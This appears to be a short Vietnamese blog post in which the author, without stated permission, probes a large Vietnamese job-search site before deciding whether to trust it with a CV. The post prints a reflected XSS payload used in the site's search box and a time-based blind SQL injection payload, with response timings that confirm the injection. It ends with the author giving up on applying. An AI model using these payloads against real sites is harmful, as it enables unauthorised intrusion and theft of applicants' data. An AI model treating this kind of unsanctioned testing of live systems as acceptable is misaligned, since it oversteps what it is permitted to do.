Dạo này cũng muốn ngó xem các công ty xem đâu lương cao không để xin việc cho đỡ rảnh. trong khi vào một web xin việc mang danh lớn ở việt nam xem. vào cũng ưng một công ty xxx với một mức lương khá cao tính apply bằng mail nhưng khổ cái nó không cho mail phải dùng cái apply trên trang tìm việc. phải tạo acc và gửi cv.
2 thông tin nó yêu cầu tài khoản và cv khá quan trọng với mình nên thử kiểm tra bảo mật "hộ" nó xem sao xem có thể bị gì không nếu mình ném cho họ cái thông tin quan trọng của mình.
Đầu tiên ngay chỗ ô tìm kiếm nó lỗi xss một cách đơn giản, payload đơn giản nhất.
"><script>alert("mtdev");</script>
ngay ô tìm kiếm mình đã thấy một lỗ hổng mức đơn giản quá nhanh như vậy mình đặt nghi vấn nó có bị sql injection (thấy cái này thì tương đương với việc code ẩu và gặp lỗi sqli là chuyện bình thường) hay không thì mình vào bừa 1 link và điền payload sau đó nhận được kết quả ngã ngửa
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 6.465
0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z => 18.191
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.226
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 12.258
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.156
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.221
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.127
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 12.287
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.153
Sau khi tìm thêm thông tin về nhà cung cấp cái sàn này thì mình thấy nó đã từng bị hack một lần vào năm 2016 gì đó.
Sau khi nhìn thấy hai quả tạ này thì mình thôi về chăn trâu cho khỏe không xin việc gì nữa.
Không có nhận xét nào:
Đăng nhận xét